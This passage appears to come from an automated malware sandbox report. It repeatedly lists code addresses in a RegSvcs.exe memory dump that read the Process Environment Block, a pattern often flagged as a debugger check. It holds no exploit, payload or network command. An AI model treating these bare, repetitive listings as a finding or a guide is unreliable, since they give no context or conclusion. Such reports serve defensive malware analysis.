Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01812581 mov eax, dword ptr fs:[00000030h] 6_2_01812581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01812581 mov eax, dword ptr fs:[00000030h] 6_2_01812581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01812581 mov eax, dword ptr fs:[00000030h] 6_2_01812581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01812581 mov eax, dword ptr fs:[00000030h] 6_2_01812581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A2D82 mov eax, dword ptr fs:[00000030h] 6_2_018A2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A2D82 mov eax, dword ptr fs:[00000030h] 6_2_018A2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A2D82 mov eax, dword ptr fs:[00000030h] 6_2_018A2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A2D82 mov eax, dword ptr fs:[00000030h] 6_2_018A2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A2D82 mov eax, dword ptr fs:[00000030h] 6_2_018A2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A2D82 mov eax, dword ptr fs:[00000030h] 6_2_018A2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A2D82 mov eax, dword ptr fs:[00000030h] 6_2_018A2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181FD9B mov eax, dword ptr fs:[00000030h] 6_2_0181FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181FD9B mov eax, dword ptr fs:[00000030h] 6_2_0181FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018135A1 mov eax, dword ptr fs:[00000030h] 6_2_018135A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B05AC mov eax, dword ptr fs:[00000030h] 6_2_018B05AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B05AC mov eax, dword ptr fs:[00000030h] 6_2_018B05AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01811DB5 mov eax, dword ptr fs:[00000030h] 6_2_01811DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01811DB5 mov eax, dword ptr fs:[00000030h] 6_2_01811DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01811DB5 mov eax, dword ptr fs:[00000030h] 6_2_01811DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F3D34 mov eax, dword ptr fs:[00000030h] 6_2_017F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F3D34 mov eax, dword ptr fs:[00000030h] 6_2_017F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F3D34 mov eax, dword ptr fs:[00000030h] 6_2_017F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F3D34 mov eax, dword ptr fs:[00000030h] 6_2_017F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F3D34 mov eax, dword ptr fs:[00000030h] 6_2_017F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F3D34 mov eax, dword ptr fs:[00000030h] 6_2_017F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F3D34 mov eax, dword ptr fs:[00000030h] 6_2_017F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F3D34 mov eax, dword ptr fs:[00000030h] 6_2_017F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F3D34 mov eax, dword ptr fs:[00000030h] 6_2_017F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F3D34 mov eax, dword ptr fs:[00000030h] 6_2_017F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F3D34 mov eax, dword ptr fs:[00000030h] 6_2_017F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F3D34 mov eax, dword ptr fs:[00000030h] 6_2_017F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F3D34 mov eax, dword ptr fs:[00000030h] 6_2_017F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017EAD30 mov eax, dword ptr fs:[00000030h] 6_2_017EAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01866DC9 mov eax, dword ptr fs:[00000030h] 6_2_01866DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01866DC9 mov eax, dword ptr fs:[00000030h] 6_2_01866DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01866DC9 mov eax, dword ptr fs:[00000030h] 6_2_01866DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01866DC9 mov ecx, dword ptr fs:[00000030h] 6_2_01866DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01866DC9 mov eax, dword ptr fs:[00000030h] 6_2_01866DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01866DC9 mov eax, dword ptr fs:[00000030h] 6_2_01866DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018AFDE2 mov eax, dword ptr fs:[00000030h] 6_2_018AFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018AFDE2 mov eax, dword ptr fs:[00000030h] 6_2_018AFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018AFDE2 mov eax, dword ptr fs:[00000030h] 6_2_018AFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018AFDE2 mov eax, dword ptr fs:[00000030h] 6_2_018AFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01898DF1 mov eax, dword ptr fs:[00000030h] 6_2_01898DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017FD5E0 mov eax, dword ptr fs:[00000030h] 6_2_017FD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017FD5E0 mov eax, dword ptr fs:[00000030h] 6_2_017FD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0186A537 mov eax, dword ptr fs:[00000030h] 6_2_0186A537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018AE539 mov eax, dword ptr fs:[00000030h] 6_2_018AE539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01814D3B mov eax, dword ptr fs:[00000030h] 6_2_01814D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01814D3B mov eax, dword ptr fs:[00000030h] 6_2_01814D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01814D3B mov eax, dword ptr fs:[00000030h] 6_2_01814D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B8D34 mov eax, dword ptr fs:[00000030h] 6_2_018B8D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01823D43 mov eax, dword ptr fs:[00000030h] 6_2_01823D43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01863540 mov eax, dword ptr fs:[00000030h] 6_2_01863540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01893D40 mov eax, dword ptr fs:[00000030h] 6_2_01893D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01807D50 mov eax, dword ptr fs:[00000030h] 6_2_01807D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E2D8A mov eax, dword ptr fs:[00000030h] 6_2_017E2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E2D8A mov eax, dword ptr fs:[00000030h] 6_2_017E2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E2D8A mov eax, dword ptr fs:[00000030h] 6_2_017E2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E2D8A mov eax, dword ptr fs:[00000030h] 6_2_017E2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E2D8A mov eax, dword ptr fs:[00000030h] 6_2_017E2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180C577 mov eax, dword ptr fs:[00000030h] 6_2_0180C577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180C577 mov eax, dword ptr fs:[00000030h] 6_2_0180C577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4496 mov eax, dword ptr fs:[00000030h] 6_2_018A4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4496 mov eax, dword ptr fs:[00000030h] 6_2_018A4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4496 mov eax, dword ptr fs:[00000030h] 6_2_018A4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4496 mov eax, dword ptr fs:[00000030h] 6_2_018A4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4496 mov eax, dword ptr fs:[00000030h] 6_2_018A4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4496 mov eax, dword ptr fs:[00000030h] 6_2_018A4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4496 mov eax, dword ptr fs:[00000030h] 6_2_018A4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4496 mov eax, dword ptr fs:[00000030h] 6_2_018A4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4496 mov eax, dword ptr fs:[00000030h] 6_2_018A4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4496 mov eax, dword ptr fs:[00000030h] 6_2_018A4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4496 mov eax, dword ptr fs:[00000030h] 6_2_018A4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4496 mov eax, dword ptr fs:[00000030h] 6_2_018A4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4496 mov eax, dword ptr fs:[00000030h] 6_2_018A4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B8CD6 mov eax, dword ptr fs:[00000030h] 6_2_018B8CD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A14FB mov eax, dword ptr fs:[00000030h] 6_2_018A14FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01866CF0 mov eax, dword ptr fs:[00000030h] 6_2_01866CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01866CF0 mov eax, dword ptr fs:[00000030h] 6_2_01866CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01866CF0 mov eax, dword ptr fs:[00000030h] 6_2_01866CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B740D mov eax, dword ptr fs:[00000030h] 6_2_018B740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B740D mov eax, dword ptr fs:[00000030h] 6_2_018B740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B740D mov eax, dword ptr fs:[00000030h] 6_2_018B740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A1C06 mov eax, dword ptr fs:[00000030h] 6_2_018A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A1C06 mov eax, dword ptr fs:[00000030h] 6_2_018A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A1C06 mov eax, dword ptr fs:[00000030h] 6_2_018A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A1C06 mov eax, dword ptr fs:[00000030h] 6_2_018A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A1C06 mov eax, dword ptr fs:[00000030h] 6_2_018A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A1C06 mov eax, dword ptr fs:[00000030h] 6_2_018A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A1C06 mov eax, dword ptr fs:[00000030h] 6_2_018A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A1C06 mov eax, dword ptr fs:[00000030h] 6_2_018A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A1C06 mov eax, dword ptr fs:[00000030h] 6_2_018A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A1C06 mov eax, dword ptr fs:[00000030h] 6_2_018A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A1C06 mov eax, dword ptr fs:[00000030h] 6_2_018A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A1C06 mov eax, dword ptr fs:[00000030h] 6_2_018A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A1C06 mov eax, dword ptr fs:[00000030h] 6_2_018A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A1C06 mov eax, dword ptr fs:[00000030h] 6_2_018A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01866C0A mov eax, dword ptr fs:[00000030h] 6_2_01866C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01866C0A mov eax, dword ptr fs:[00000030h] 6_2_01866C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01866C0A mov eax, dword ptr fs:[00000030h] 6_2_01866C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01866C0A mov eax, dword ptr fs:[00000030h] 6_2_01866C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181BC2C mov eax, dword ptr fs:[00000030h] 6_2_0181BC2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181A44B mov eax, dword ptr fs:[00000030h] 6_2_0181A44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0187C450 mov eax, dword ptr fs:[00000030h] 6_2_0187C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0187C450 mov eax, dword ptr fs:[00000030h] 6_2_0187C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F849B mov eax, dword ptr fs:[00000030h] 6_2_017F849B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180746D mov eax, dword ptr fs:[00000030h] 6_2_0180746D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180B477 mov eax, dword ptr fs:[00000030h] 6_2_0180B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180B477 mov eax, dword ptr fs:[00000030h] 6_2_0180B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180B477 mov eax, dword ptr fs:[00000030h] 6_2_0180B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180B477 mov eax, dword ptr fs:[00000030h] 6_2_0180B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180B477 mov eax, dword ptr fs:[00000030h] 6_2_0180B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180B477 mov eax, dword ptr fs:[00000030h] 6_2_0180B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180B477 mov eax, dword ptr fs:[00000030h] 6_2_0180B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180B477 mov eax, dword ptr fs:[00000030h] 6_2_0180B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180B477 mov eax, dword ptr fs:[00000030h] 6_2_0180B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180B477 mov eax, dword ptr fs:[00000030h] 6_2_0180B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180B477 mov eax, dword ptr fs:[00000030h] 6_2_0180B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180B477 mov eax, dword ptr fs:[00000030h] 6_2_0180B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181AC7B mov eax, dword ptr fs:[00000030h] 6_2_0181AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181AC7B mov eax, dword ptr fs:[00000030h] 6_2_0181AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181AC7B mov eax, dword ptr fs:[00000030h] 6_2_0181AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181AC7B mov eax, dword ptr fs:[00000030h] 6_2_0181AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181AC7B mov eax, dword ptr fs:[00000030h] 6_2_0181AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181AC7B mov eax, dword ptr fs:[00000030h] 6_2_0181AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181AC7B mov eax, dword ptr fs:[00000030h] 6_2_0181AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181AC7B mov eax, dword ptr fs:[00000030h] 6_2_0181AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181AC7B mov eax, dword ptr fs:[00000030h] 6_2_0181AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181AC7B mov eax, dword ptr fs:[00000030h] 6_2_0181AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181AC7B mov eax, dword ptr fs:[00000030h] 6_2_0181AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01867794 mov eax, dword ptr fs:[00000030h] 6_2_01867794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01867794 mov eax, dword ptr fs:[00000030h] 6_2_01867794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01867794 mov eax, dword ptr fs:[00000030h] 6_2_01867794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017FFF60 mov eax, dword ptr fs:[00000030h] 6_2_017FFF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017FEF40 mov eax, dword ptr fs:[00000030h] 6_2_017FEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E4F2E mov eax, dword ptr fs:[00000030h] 6_2_017E4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E4F2E mov eax, dword ptr fs:[00000030h] 6_2_017E4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018237F5 mov eax, dword ptr fs:[00000030h] 6_2_018237F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B070D mov eax, dword ptr fs:[00000030h] 6_2_018B070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B070D mov eax, dword ptr fs:[00000030h] 6_2_018B070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181A70E mov eax, dword ptr fs:[00000030h] 6_2_0181A70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181A70E mov eax, dword ptr fs:[00000030h] 6_2_0181A70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180F716 mov eax, dword ptr fs:[00000030h] 6_2_0180F716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0187FF10 mov eax, dword ptr fs:[00000030h] 6_2_0187FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0187FF10 mov eax, dword ptr fs:[00000030h] 6_2_0187FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181E730 mov eax, dword ptr fs:[00000030h] 6_2_0181E730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180B73D mov eax, dword ptr fs:[00000030h] 6_2_0180B73D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180B73D mov eax, dword ptr fs:[00000030h] 6_2_0180B73D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B8F6A mov eax, dword ptr fs:[00000030h] 6_2_018B8F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F8794 mov eax, dword ptr fs:[00000030h] 6_2_017F8794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0187FE87 mov eax, dword ptr fs:[00000030h] 6_2_0187FE87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F766D mov eax, dword ptr fs:[00000030h] 6_2_017F766D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018646A7 mov eax, dword ptr fs:[00000030h] 6_2_018646A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B0EA5 mov eax, dword ptr fs:[00000030h] 6_2_018B0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B0EA5 mov eax, dword ptr fs:[00000030h] 6_2_018B0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B0EA5 mov eax, dword ptr fs:[00000030h] 6_2_018B0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F7E41 mov eax, dword ptr fs:[00000030h] 6_2_017F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F7E41 mov eax, dword ptr fs:[00000030h] 6_2_017F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F7E41 mov eax, dword ptr fs:[00000030h] 6_2_017F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F7E41 mov eax, dword ptr fs:[00000030h] 6_2_017F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F7E41 mov eax, dword ptr fs:[00000030h] 6_2_017F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F7E41 mov eax, dword ptr fs:[00000030h] 6_2_017F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01828EC7 mov eax, dword ptr fs:[00000030h] 6_2_01828EC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0189FEC0 mov eax, dword ptr fs:[00000030h] 6_2_0189FEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018136CC mov eax, dword ptr fs:[00000030h] 6_2_018136CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B8ED6 mov eax, dword ptr fs:[00000030h] 6_2_018B8ED6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017EE620 mov eax, dword ptr fs:[00000030h] 6_2_017EE620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018116E0 mov ecx, dword ptr fs:[00000030h] 6_2_018116E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017EC600 mov eax, dword ptr fs:[00000030h] 6_2_017EC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017EC600 mov eax, dword ptr fs:[00000030h] 6_2_017EC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017EC600 mov eax, dword ptr fs:[00000030h] 6_2_017EC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01818E00 mov eax, dword ptr fs:[00000030h] 6_2_01818E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A1608 mov eax, dword ptr fs:[00000030h] 6_2_018A1608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F76E2 mov eax, dword ptr fs:[00000030h] 6_2_017F76E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181A61C mov eax, dword ptr fs:[00000030h] 6_2_0181A61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181A61C mov eax, dword ptr fs:[00000030h] 6_2_0181A61C
